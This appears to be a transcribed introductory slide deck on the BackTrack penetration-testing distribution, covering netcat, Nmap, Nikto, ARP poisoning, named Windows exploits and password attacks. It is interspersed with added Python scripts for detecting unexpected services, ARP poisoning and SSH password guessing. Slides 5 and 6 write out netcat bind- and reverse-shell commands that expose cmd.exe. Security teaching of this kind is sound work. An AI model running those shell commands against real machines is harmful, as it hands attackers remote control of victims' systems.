Introduction to BackTrack - PowerPoint PPT Presentation

1
Introduction to BackTrack
Local boot to remote root in just one CD
Thought for the day: "Don't learn to hack, hack to learn..!!!" - darknet.org.uk
Kunal Sehgal (kun.seh_at_gmail.com)
2
  • Introduction
  • BackTrack is a suite of penetration
    testing/vulnerability assessment tools installed
    on a Linux operating system, all wrapped up on a
    bootable (live) CD
  • The top-rated Linux live distribution focused on
    penetration testing
  • Consists of more than 300 different up-to-date
    tools, logically structured according to the
    workflow of security professionals
  • Rated #1 security distro by insecure.org /
    sectools.org

3
  • Miscellaneous BT Services
  • HTTP (Port 80)
  • TFTP (Port 69)
  • SSH (Port 22)
  • VNC (Port 5901)

4
  • Netcat
  • A computer networking utility for reading from
    and writing to network connections on either TCP
    or UDP
  • Feature-rich network debugging and exploration
    tool, since it can create almost any kind of
    connection you would need, including port binding
    to accept incoming connections
  • Bind Shell
  • Reverse Shell

5
Bind Shell
(Diagram: Attacker (Private IP) -> NAT -> Internet -> Victim (Public IP).
The attacker connects to the victim, so the traffic is incoming on the victim's side.)
Victim listens:    nc -lvp 4444 -e cmd.exe
Attacker connects: nc -v <IP> 4444
6
Reverse Shell
(Diagram: Attacker (Public IP) <- Internet <- NAT <- Victim (Private IP).
The victim sends the shell, so the traffic is outgoing from the victim's side.)
Victim connects:  nc -v <IP> 4444 -e cmd.exe
Attacker listens: nc -lvp 4444
7
  • Nmap
  • A security scanner used to discover computers and
    services on a computer network, thus creating a
    "map" of the network
  • Capable of discovering passive services on a
    network despite the fact that such services
    aren't advertising themselves
  • May be able to determine various details about
    the remote computers. These include operating
    system, device type, uptime, software product
    used to run a service, exact version number of
    that product, etc.
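The service and version details Nmap reports are only useful once they are compared against what a host is supposed to run. The following is an added example (not from the slides or from Nmap): a parser for Nmap's grepable output (`-oG`) that builds a per-host inventory and flags open ports missing from an allow-list. The scan text and the allow-list are constructed for the demo.

```python
"""Turn nmap grepable output (-oG) into an inventory and flag unexpected services.

Added example, not part of the slides or of nmap. The input below is a
constructed set of "Host:" lines; the allow-list is an assumption of the demo.
"""
import re

# -oG port entries look like port/state/proto/owner/service/rpcinfo/version/ ;
# owner and rpcinfo are almost always empty, which gives the double slashes.
PORT_FIELD = re.compile(r"(\d+)/([^/]+)/(\w+)//([^/]*)//([^/]*)/")


def parse_grepable(text):
    """Return {ip: [(port, state, proto, service, version), ...]} for every Host line."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        ip = line.split()[1]
        # The "Status: Up" lines carry no ports; the "Ports:" field ends at a tab.
        ports_part = line.split("Ports: ", 1)[1] if "Ports: " in line else ""
        ports_part = ports_part.split("\t")[0]
        entries = [
            (int(port), state, proto, service, version.strip())
            for port, state, proto, service, version in PORT_FIELD.findall(ports_part)
        ]
        hosts.setdefault(ip, []).extend(entries)
    return hosts


def unexpected_services(hosts, allowed):
    """Open ports that are not in the per-host allow-list, as (ip, port, service, version)."""
    findings = []
    for ip, entries in sorted(hosts.items()):
        for port, state, proto, service, version in entries:
            if state == "open" and port not in allowed.get(ip, set()):
                findings.append((ip, port, service, version))
    return findings


# Constructed sample of `nmap -sV -oG -` output (two hosts, fields in nmap's layout).
SAMPLE = (
    "# Nmap scan (constructed sample output)\n"
    "Host: 192.168.1.10 ()\tStatus: Up\n"
    "Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3p1/, "
    "80/open/tcp//http//Apache httpd 2.2.14/\tIgnored State: closed (998)\n"
    "Host: 192.168.1.11 ()\tStatus: Up\n"
    "Host: 192.168.1.11 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, "
    "445/open/tcp//microsoft-ds///, 5900/open/tcp//vnc//VNC (protocol 3.8)/"
    "\tIgnored State: closed (997)\n"
    "# Nmap done -- 2 IP addresses (2 hosts up) scanned\n"
)

# Assumed allow-list: what each host is expected to expose.
ALLOWED = {"192.168.1.10": {22, 80}, "192.168.1.11": {135, 445}}

if __name__ == "__main__":
    inventory = parse_grepable(SAMPLE)
    for ip, port, service, version in unexpected_services(inventory, ALLOWED):
        print(f"{ip}:{port} {service} {version} is open but not on the allow-list")
```

Run against real output with `nmap -sV -oG scan.txt <range>` and `parse_grepable(open("scan.txt").read())`; the VNC listener on the second host (compare slide 3, where BackTrack itself offers VNC on 5901) is the kind of service this check is meant to surface.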

8
  • Nikto
  • A scanner which performs comprehensive tests
    against web servers for multiple items
  • Includes over 3500 potentially dangerous
    files/CGIs, versions on over 900 servers, and
    version-specific problems on over 250 servers
  • Not every check is a security problem, though
    most are
  • Some items are "info only" checks that look for
    things that may not be a security flaw, but that
    the webmaster or security engineer may not know
    are present on the server

9
  • ARP Poisoning / Man In The Middle Attack
  • MAC Address: Hardware address or physical address
    is a quasi-unique identifier assigned to most
    network adapters or network interface cards
    (NICs) by the manufacturer for identification
  • Address Resolution Protocol (ARP): A method for
    finding a host's hardware address when only its
    Network Layer address is known
  • Ettercap: A suite for man in the middle attacks
    on a LAN. It features sniffing of live connections,
    content filtering on the fly and many other
    interesting tricks

10
Network Using A Hub
(Diagram: Sender, Receiver and Attacker share one hub; the attacker can easily sniff data)
11
Network Using A Switch
(Diagram: Sender, Receiver and Attacker on one switch; the attacker cannot sniff any data)
12
Man In The Middle Attack
(Diagram: the Attacker sits between Sender and Receiver, announcing "Hi everyone, I'm the switch")
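The "I'm the switch" trick on the slide works by sending ARP replies that bind the gateway's and the victim's IP addresses to the attacker's MAC. Those replies are visible to anyone listening on the segment, so the poisoning can be detected from the same traffic it relies on. The following is an added example (not from the slides and not Ettercap): it parses the `Reply <ip> is-at <mac>` summaries `tcpdump -n arp` prints and raises an alert when an IP's MAC changes or when one MAC claims the gateway plus another host. The capture lines are constructed for the demo.

```python
"""Detect ARP poisoning from a stream of ARP replies.

Added example, not from the slides or from Ettercap. Input lines are
constructed to mimic `tcpdump -n arp` output ("Reply <ip> is-at <mac>");
only that two-field summary is parsed.
"""
import re
from collections import defaultdict

ARP_REPLY = re.compile(
    r"Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_reply(line):
    """Return (ip, mac) for an ARP reply line, or None for anything else."""
    m = ARP_REPLY.search(line)
    return (m.group("ip"), m.group("mac").lower()) if m else None


def detect(lines, gateway_ip):
    """Return alert strings. Two signals:
    1. an IP whose advertised MAC changes (the victim's cache is being rewritten);
    2. one MAC advertising itself for the gateway *and* another host, i.e. a
       station telling both ends of a conversation "I'm the switch/gateway".
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    reported_claims = set()
    alerts = []
    for line in lines:
        parsed = parse_reply(line)
        if not parsed:
            continue
        ip, mac = parsed
        old = ip_to_mac.get(ip)
        if old and old != mac:
            alerts.append(f"{ip} changed from {old} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        claimed = mac_to_ips[mac]
        if gateway_ip in claimed and len(claimed) > 1 and mac not in reported_claims:
            others = ", ".join(sorted(claimed - {gateway_ip}))
            alerts.append(f"{mac} claims gateway {gateway_ip} and {others}")
            reported_claims.add(mac)
    return alerts


# Constructed capture: the real gateway and a host answer first, then a third
# station (..:99) answers for the gateway's IP and then for the host's IP.
SAMPLE_LINES = [
    "12:00:01.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28",
    "12:00:01.500 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:20, length 28",
    "12:00:02.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:99, length 28",
    "12:00:02.100 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:99, length 28",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LINES, gateway_ip="192.168.1.1"):
        print(alert)
```

Feed it live with `tcpdump -n -l arp | python3 this_script.py`-style piping after replacing `SAMPLE_LINES` with `sys.stdin`; on a network with DHCP, a MAC change for an IP that was just released is normal, so in practice the first signal is gated on a short time window while the second (one MAC for the gateway and a host) is the stronger indicator.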
13
  • Exploits
  • An exploit is a piece of software, a chunk of
    data, or a sequence of commands that takes advantage
    of a bug, glitch or vulnerability in order to
    cause unintended or unanticipated behavior to
    occur
  • Frequently includes such things as forcibly
    gaining control of a computer system, allowing
    privilege escalation, or a denial of service
    attack
  • Zero Day Exploit: A threat that tries to exploit
    unknown, undisclosed or patch-free computer
    application vulnerabilities
  • www.securityfocus.com
  • www.milw0rm.com

14
  • Exploits (Contd.)
  • Attack / Exploit: made up of a Vulnerability and a Payload
  • Vulnerability (what is exploited):
    • App
    • Protocol
    • O/S
  • Payload (what the exploit does once it works):
    • Add a user
    • Get a remote shell
    • GUI access
    • Change routing tables
    • Etc.. Etc..

15
  • Exploit Frameworks
  • A development platform for creating security
    tools and exploits
  • Used by network security professionals to perform
    penetration tests, system administrators to
    verify patch installations, product vendors to
    perform regression testing, and security
    researchers worldwide
  • A boon for script kiddies

16
  • Windows DCOM RPC Interface Buffer Overrun
  • Exploits a vulnerability in Windows OS
  • The issue is due to insufficient bounds checking
    of client DCOM object activation requests.
    Exploitation of this issue could result in
    execution of malicious instructions with Local
    System privileges on an affected system
  • www.securityfocus.com/bid/8205
  • Bind Shell

17
  • IE IsComponentInstalled Buffer Overflow
    Vulnerability
  • Exploits a vulnerability in an application (MS
    Internet Explorer)
  • Microsoft Internet Explorer is prone to a remote
    buffer-overflow vulnerability in the
    'IsComponentInstalled()' method. A successful
    exploit results in arbitrary code execution in
    the context of the user running the browser
  • www.securityfocus.com/bid/16870
  • Reverse Shell

18
  • MS Windows Graphics Rendering Engine WMF
  • Exploits a vulnerability in MS Windows WMF
    graphics rendering engine
  • The problem presents itself when a user views a
    malicious WMF formatted file, triggering the
    vulnerability when the engine attempts to parse
    the file
  • www.securityfocus.com/bid/16074

19
  • Password Hacking
  • Why hack local passwords?
    • Install software: key loggers, trojans, etc.
    • Gain access to another PC, server, router, etc.
    • People re-use passwords all the time
  • Types of attack
    • Brute-force Attack
    • Dictionary Attack
    • Rainbow Tables

20
  • Password Attack Vectors
  • Online Attack: Attacking network services that
    require a user to log on, by guessing the correct
    password
  • Offline Attack: Attacking hash files that store
    encrypted (hashed) passwords
  • Physical Access Attack: Attacking machines and
    other network devices after gaining physical
    access
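Of the three vectors, the online attack is the one the target can see while it happens: every wrong guess against a logon service leaves a failure record. The following is an added example (not from the slides or from any of the tools named on them): it reads sshd-style syslog lines, constructed for the demo with an assumed year for timestamp parsing, and flags both a single source hammering one account (brute force / dictionary) and a single source trying a few guesses across many accounts (password spraying). The thresholds are illustrative.

```python
"""Spot online password-guessing in sshd logs.

Added example; the log lines are constructed in syslog style, and a fixed
year is assumed because syslog timestamps carry none. Thresholds are
illustrative values, not recommendations.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

FAILED = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)


def parse(line, year=2024):
    """Return (timestamp, user, source_ip) for a failed-password line, else None."""
    m = FAILED.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return ts, m.group("user"), m.group("ip")


def detect(lines, window=timedelta(minutes=5), per_ip_threshold=5, spray_users=3):
    """Return {source_ip: verdict}. Two signals from the 'online attack' vector:
    - brute force / dictionary: >= per_ip_threshold failures from one IP inside `window`
    - password spraying: >= spray_users distinct accounts tried from one IP inside `window`
    """
    events = sorted(e for e in map(parse, lines) if e)
    by_ip = defaultdict(list)
    for ts, user, ip in events:
        by_ip[ip].append((ts, user))

    verdicts = {}
    for ip, hits in by_ip.items():
        max_fail, max_users, start = 0, 0, 0
        # Sliding window over the time-ordered failures of this source.
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            span = hits[start:end + 1]
            max_fail = max(max_fail, len(span))
            max_users = max(max_users, len({u for _, u in span}))
        if max_fail >= per_ip_threshold:
            verdicts[ip] = "brute force"
        elif max_users >= spray_users:
            verdicts[ip] = "password spraying"
    return verdicts


# Constructed sample log: a dictionary run against root, a spray across three
# accounts, and one ordinary typo followed by a successful logon.
SAMPLE_LOG = [
    "Mar 10 09:00:01 bt sshd[1001]: Failed password for root from 203.0.113.5 port 40001 ssh2",
    "Mar 10 09:00:02 bt sshd[1002]: Failed password for root from 203.0.113.5 port 40002 ssh2",
    "Mar 10 09:00:03 bt sshd[1003]: Failed password for root from 203.0.113.5 port 40003 ssh2",
    "Mar 10 09:00:04 bt sshd[1004]: Failed password for root from 203.0.113.5 port 40004 ssh2",
    "Mar 10 09:00:05 bt sshd[1005]: Failed password for root from 203.0.113.5 port 40005 ssh2",
    "Mar 10 09:10:00 bt sshd[1010]: Failed password for invalid user alice from 198.51.100.9 port 5000 ssh2",
    "Mar 10 09:11:00 bt sshd[1011]: Failed password for bob from 198.51.100.9 port 5001 ssh2",
    "Mar 10 09:12:00 bt sshd[1012]: Failed password for carol from 198.51.100.9 port 5002 ssh2",
    "Mar 10 09:30:00 bt sshd[1020]: Failed password for dave from 192.0.2.8 port 6000 ssh2",
    "Mar 10 09:30:05 bt sshd[1021]: Accepted password for dave from 192.0.2.8 port 6000 ssh2",
]

if __name__ == "__main__":
    for ip, verdict in detect(SAMPLE_LOG).items():
        print(f"{ip}: {verdict}")
```

The spraying branch matters because a lockout policy tuned only to failures-per-account never fires when each account sees one or two guesses; counting distinct accounts per source is what catches it. Offline and physical-access attacks leave no such trail on the logon service, which is why those two vectors are handled by protecting the hash store and the hardware rather than by log monitoring.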

21
  • How To Hack Windows Passwords?
  • Available Tools: John The Ripper, Cain & Abel,
    Rainbow Tables
  • Gain access to the victim's PC

22
  • Google Hacking
  • Google hacking is a term that refers to the act
    of creating complex search engine queries in
    order to filter through large amounts of search
    results
  • In its malicious format it can be used to detect
    websites that are vulnerable to numerous exploits
    and vulnerabilities as well as locate private,
    sensitive information about others
  • http://johnny.ihackstuff.com

23
  • References
  • www.remote-exploit.org
  • www.offensive-security.com
  • www.wikipedia.org
  • www.metasploit.com
  • www.irongeek.com
  • www.cirt.net/nikto2
  • www.sourceforge.net
  • www.securityfocus.com
  • www.darknet.org.uk
  • johnny.ihackstuff.com
  • www.oxid.it/cain.html

24
  • Questions??
  • Feel free to contact me
  • Kunal Sehgal

25
  • Workshop Exercise